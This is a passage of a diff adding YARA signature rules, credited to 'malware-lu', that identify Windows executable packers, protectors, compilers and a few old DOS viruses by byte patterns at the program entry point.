+	$a1 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 5A 0A 00 00 8D 9D 40 02 00 00 33 FF E8 83 01 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 EB 09 00 00 89 85 3A 0A 00 00 EB 14 60 FF B5 3A 0A }
+	$a2 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 EB 03 0C 00 00 EB 03 0C 00 00 8D B5 CB 22 00 00 8D 9D F0 02 00 00 33 FF E8 47 02 00 00 EB 03 15 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 9B 0A }
+	$a3 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 2C 0A 00 00 8D 9D 22 02 00 00 33 FF E8 ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 CD 09 00 00 89 85 ?? ?? ?? ?? EB 14 60 FF B5 14 0A }
+	$a4 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 5A 0A 00 00 8D 9D 40 02 00 00 33 FF E8 ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 EB 09 00 00 89 85 ?? ?? ?? ?? EB 14 60 FF B5 3A 0A }
+	$a5 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8D B5 CB 22 00 00 8D 9D F0 02 00 00 33 FF E8 ?? ?? ?? ?? EB 03 ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 9B 0A }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point or $a2 at pe.entry_point or $a3 at pe.entry_point or $a4 at pe.entry_point or $a5 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02VOBProtectCD5Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 36 3E 26 8A C0 60 E8 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PESpinv04x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 68 60 E8 00 00 00 00 8B }
+
+condition:
+		$a0
+}
+	
+	
+rule PseudoSigner02WatcomCCDLLAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 56 57 55 8B 74 24 14 8B 7C 24 18 8B 6C 24 1C 83 FF 03 0F 87 01 00 00 00 F1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule yodasCrypter13AshkbizDanehkar
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 53 56 57 60 E8 00 00 00 00 5D 81 ED 6C 28 40 00 B9 5D 34 40 00 81 E9 C6 28 40 00 8B D5 81 C2 C6 28 40 00 8D 3A 8B F7 33 C0 EB 04 90 EB 01 C2 AC }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule D1NS1GD1N
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 18 37 00 00 00 00 00 00 01 00 0A 00 00 00 18 00 00 80 00 00 00 00 ?? ?? 18 37 00 00 00 00 02 00 00 00 88 00 00 80 38 00 00 80 96 00 00 80 50 00 00 80 00 00 00 00 ?? ?? 18 37 00 00 00 00 00 00 01 00 00 00 00 00 68 00 00 00 00 00 00 00 ?? ?? 18 37 00 00 00 00 00 00 01 00 00 00 00 00 78 00 00 00 B0 F0 00 00 10 00 00 00 00 00 00 00 00 00 00 00 C0 F0 00 00 60 00 00 00 00 00 00 00 00 00 00 00 06 00 44 00 56 00 43 00 4C 00 41 00 4C 00 0B 00 50 00 41 00 43 00 4B 00 41 00 47 00 45 00 49 00 4E 00 46 00 4F 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule FSGv110EngdulekxtMicrosoftVisualC6070ASM
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 01 00 00 00 5A 5E E8 02 00 00 00 BA DD 5E 03 F2 EB 01 64 BB 80 ?? ?? 00 8B FA EB 01 A8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv102aAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 89 44 24 1C 61 FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01MinGWGCC2xAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 89 E5 E8 02 00 00 00 C9 C3 90 90 45 58 45 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov253
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 40 ?? ?? ?? 68 54 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 58 ?? ?? ?? 33 D2 8A D4 89 15 EC }
+	$a1 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? 40 ?? ?? ?? ?? 68 54 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF ?? ?? ?? 15 58 33 D2 8A D4 89 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Armadillov252
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 ?? ?? ?? ?? E0 ?? ?? ?? ?? 68 D4 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF ?? ?? ?? 15 38 }
+	$a1 = { 55 8B EC 6A FF 68 E0 ?? ?? ?? 68 D4 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 38 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule Armadillov251
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 B8 ?? ?? ?? 68 D0 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 20 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov250
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 B8 ?? ?? ?? 68 F8 ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 20 ?? ?? ?? 33 D2 8A D4 89 15 D0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidium1331ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 01 ?? E8 29 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 24 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 01 ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 01 ?? 83 C4 04 EB 02 ?? ?? E8 5F 27 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CExev10a
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 0C 02 ?? ?? 56 BE 04 01 ?? ?? 8D 85 F8 FE FF FF 56 50 6A ?? FF 15 54 10 40 ?? 8A 8D F8 FE FF FF 33 D2 84 C9 8D 85 F8 FE FF FF 74 16 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DIETv144v145f
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F8 9C 06 1E 57 56 52 51 53 50 0E FC 8C C8 BA ?? ?? 03 D0 52 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv098
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB D7 84 40 ?? 87 DD 8B 85 5C 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv099
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 2F 85 40 ?? 87 DD 8B 85 B4 85 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPacKV30LiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? ?? ?? 66 8B 06 66 83 F8 00 74 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtMicrosoftVisualBasic5060
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { C1 CB 10 EB 01 0F B9 03 74 F6 EE 0F B6 D3 8D 05 83 ?? ?? EF 80 F3 F6 2B C1 EB 01 DE 68 77 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv090
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? 40 00 C3 9C 60 BD ?? ?? 00 00 B9 02 00 00 00 B0 90 8D BD 7A 42 40 00 F3 AA 01 AD D9 43 40 00 FF B5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv092
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 BD ?? ?? ?? ?? B9 02 ?? ?? ?? B0 90 8D BD A5 4F 40 ?? F3 AA 01 AD 04 51 40 ?? FF B5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv094
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 ?? ?? ?? ?? 5D 55 58 81 ED ?? ?? ?? ?? 2B 85 ?? ?? ?? ?? 01 85 ?? ?? ?? ?? 50 B9 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PeX099bartCrackPl
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 F5 ?? ?? ?? 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ObsidiumV1304ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 ?? 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftwareCompressv14LITEBGSoftwareProtectTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 81 2C 24 AA 1A 41 00 5D E8 00 00 00 00 83 2C 24 6E 8B 85 5D 1A 41 00 29 04 24 8B 04 24 89 85 5D 1A 41 00 58 8B 85 5D 1A 41 00 8B 50 3C 03 D0 8B 92 80 00 00 00 03 D0 8B 4A 58 89 8D 49 1A 41 00 8B 4A 5C 89 8D 4D 1A 41 00 8B 4A 60 89 8D 55 1A }
+	$a1 = { E8 00 00 00 00 81 2C 24 AA 1A 41 00 5D E8 00 00 00 00 83 2C 24 6E 8B 85 5D 1A 41 00 29 04 24 8B 04 24 89 85 5D 1A 41 00 58 8B 85 5D 1A 41 00 8B 50 3C 03 D0 8B 92 80 00 00 00 03 D0 8B 4A 58 89 8D 49 1A 41 00 8B 4A 5C 89 8D 4D 1A 41 00 8B 4A 60 89 8D 55 1A 41 00 8B 4A 64 89 8D 51 1A 41 00 8B 4A 74 89 8D 59 1A 41 00 68 00 20 00 00 E8 D2 00 00 00 50 8D 8D 00 1C 41 00 50 51 E8 1B 00 00 00 83 C4 08 58 8D 78 74 8D B5 49 1A 41 00 B9 18 00 00 00 F3 A4 05 A4 00 00 00 50 C3 60 8B 74 24 24 8B 7C 24 28 FC B2 80 33 DB A4 B3 02 E8 6D 00 00 00 73 F6 33 C9 E8 64 00 00 00 73 1C 33 C0 E8 5B 00 00 00 73 23 B3 02 41 B0 10 E8 4F 00 00 00 12 C0 73 F7 75 3F AA EB D4 E8 4D 00 00 00 2B CB 75 10 E8 42 00 00 00 EB 28 AC D1 E8 74 4D 13 C9 EB 1C 91 48 C1 E0 08 AC E8 2C 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 8E 02 D2 75 05 8A 16 46 12 D2 C3 33 C9 41 E8 EE FF FF FF 13 C9 E8 E7 FF FF FF 72 F2 C3 2B 7C 24 28 89 7C 24 1C 61 C3 60 FF 74 24 24 6A 40 FF 95 4D 1A 41 00 89 44 24 1C 61 C2 04 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule FixupPakv120
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 E8 00 00 00 00 5D 81 ED ?? ?? 00 00 BE 00 ?? 00 00 03 F5 BA 00 00 ?? ?? 2B D5 8B DD 33 C0 AC 3C 00 74 3D 3C 01 74 0E 3C 02 74 0E 3C 03 74 0D 03 D8 29 13 EB E7 66 AD EB F6 AD EB F3 AC 0F B6 C8 3C 00 74 06 3C 01 74 09 EB 0A 66 AD 0F B7 C8 EB 03 AD 8B C8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ARCSFXArchive
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8C C8 8C DB 8E D8 8E C0 89 ?? ?? ?? 2B C3 A3 ?? ?? 89 ?? ?? ?? BE ?? ?? B9 ?? ?? BF ?? ?? BA ?? ?? FC AC 32 C2 8A D8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MoleBoxv230Teggo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 42 04 E8 ?? ?? 00 00 A3 ?? ?? ?? 00 8B 4D F0 8B 11 89 15 ?? ?? ?? 00 ?? 45 FC A3 ?? ?? ?? 00 5F 5E 8B E5 5D C3 CC CC CC CC CC CC CC CC CC CC CC E8 EB FB FF FF 58 E8 ?? 07 00 00 58 89 44 24 20 61 58 FF D0 E8 ?? ?? 00 00 CC CC CC CC CC CC CC }
+
+condition:
+		$a0
+}
+	
+	
+rule VxIgor
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E B8 CD 7B CD 21 81 FB CD 7B 75 03 E9 87 00 33 DB 0E 1F 8C }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FACRYPTv10
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B9 ?? ?? B3 ?? 33 D2 BE ?? ?? 8B FE AC 32 C3 AA 49 43 32 E4 03 D0 E3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner01WATCOMCCEXEAnorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 00 00 00 00 90 90 90 90 57 41 E9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPackV115V117aPlib043ap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8 45 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EmbedPEv113cyclotron
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 EC 50 60 68 5D B9 52 5A E8 2F 99 00 00 DC 99 F3 57 05 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule eXcaliburv103forgotus
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E9 00 00 00 00 60 E8 14 00 00 00 5D 81 ED 00 00 00 00 6A 45 E8 A3 00 00 00 68 00 00 00 00 E8 58 61 EB 39 20 45 78 63 61 6C 69 62 75 72 20 28 63 29 20 62 79 20 66 6F 72 67 6F 74 2F 75 53 2F 44 46 43 47 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petite14
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 66 9C 60 50 8B D8 03 00 68 54 BC 00 00 6A 00 FF 50 14 8B CC }
+
+condition:
+		$a0
+}
+	
+	
+rule Petite12
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petite13
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 66 9C 60 50 8D 88 00 F0 00 00 8D 90 04 16 00 00 8B DC 8B E1 }
+
+condition:
+		$a0
+}
+	
+	
+rule Upack021betaDwing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BE 88 01 40 00 AD 8B F8 6A 04 95 A5 33 C0 AB 48 AB F7 D8 59 F3 AB C1 E0 0A B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 5A 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WebCopsEXELINKDataSecurity
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 03 05 EB 02 EB FC 55 EB 03 EB 04 05 EB FB EB 53 E8 04 00 00 00 72 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02FSG10Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThemidaOreansTechnologies2004
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxNumberOne
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F9 07 3C 53 6D 69 6C 65 3E E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WinKriptv10MrCrimson
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C0 8B B8 00 ?? ?? ?? 8B 90 04 ?? ?? ?? 85 FF 74 1B 33 C9 50 EB 0C 8A 04 39 C0 C8 04 34 1B 88 04 39 41 3B CA 72 F0 58 83 C0 08 EB D5 61 E9 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv085f
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 02 00 00 00 CD 20 E8 00 00 00 00 5E 2B C9 58 74 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RosAsm2050aBetov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 60 8B 5D 08 B9 08 00 00 00 BF ?? ?? ?? ?? 83 C7 07 FD 8A C3 24 0F 04 30 3C 39 76 02 04 07 AA C1 EB 04 E2 EE FC 68 00 10 00 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 15 ?? ?? ?? ?? 61 8B E5 5D C2 04 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Obsidium13021ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 2B 26 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv211dAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 02 00 00 00 EB 09 5D 55 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv211cAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ACProtect14xRISCOsoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 4D 65 73 73 61 67 65 42 6F 78 41 00 90 4D 69 6E 65 49 6D 70 }
+
+condition:
+		$a0
+}
+	
+	
+rule SplashBitmapv100BoBBobsoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 60 8B 6C 24 20 55 81 ED ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 F9 31 C0 FC F3 AA 8B 04 24 48 66 25 00 F0 66 81 38 4D 5A 75 F4 8B 48 3C 81 3C 01 50 45 00 00 75 E8 89 85 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 6A 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEZipv10byBaGIE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { D9 D0 F8 74 02 23 DB F5 F5 50 51 52 53 8D 44 24 10 50 55 56 57 D9 D0 22 C9 C1 F7 A0 55 66 C1 C8 B0 5D 81 E6 FF FF FF FF F8 77 07 52 76 03 72 01 90 5A C1 E0 60 90 BD 1F 01 00 00 87 E8 E2 07 E3 05 17 5D 47 E4 42 41 7F 06 50 66 83 EE 00 58 25 FF FF FF FF 51 }
+
+condition:
+		$a0
+}
+	
+	
+rule LamerStopv10ccStefanEsser
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 05 ?? ?? CD 21 33 C0 8E C0 26 ?? ?? ?? 2E ?? ?? ?? 26 ?? ?? ?? 2E ?? ?? ?? BA ?? ?? FA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ACProtectV14Xrisco
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 00 00 00 7C 83 04 24 06 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxGRUNT2Family
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 48 E2 F7 C3 51 53 52 E8 DD FF 5A 5B 59 C3 B9 00 00 E2 FE C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeMicrosoftVisualC70FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 6A 00 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? 89 65 00 8B F4 89 3E 56 FF 15 ?? ?? ?? ?? 8B 4E ?? 89 0D ?? ?? ?? 00 8B 46 00 A3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule InstallStub32bit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 14 ?? 00 00 53 56 57 6A 00 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 29 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VcasmProtector10evcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 0A 5B 56 50 72 6F 74 65 63 74 5D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakePEBundle20x24xemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 30 40 00 87 DD 83 BD 9C 38 40 00 01 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov190b4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 08 E2 40 00 68 B4 96 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXv103v104Modified
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPackV2XLiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6E 73 70 61 63 6B 24 40 }
+
+condition:
+		$a0
+}
+	
+	
+rule ThemidaWinLicenseV1000V1800OreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? E8 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PACKWINv101p
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8C C0 FA 8E D0 BC ?? ?? FB 06 0E 1F 2E ?? ?? ?? ?? 8B F1 4E 8B FE 8C DB 2E ?? ?? ?? ?? 8E C3 FD F3 A4 53 B8 ?? ?? 50 CB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv110b1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 28 63 40 ?? 87 DD 8B 85 AD 63 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MicroJoiner15coban2k
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF 05 10 40 00 83 EC 30 8B EC E8 C8 FF FF FF E8 C3 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ANDpakk2018byDmitryANDAndreev
+{
+      meta:
+		author="malware-lu"
+strings:
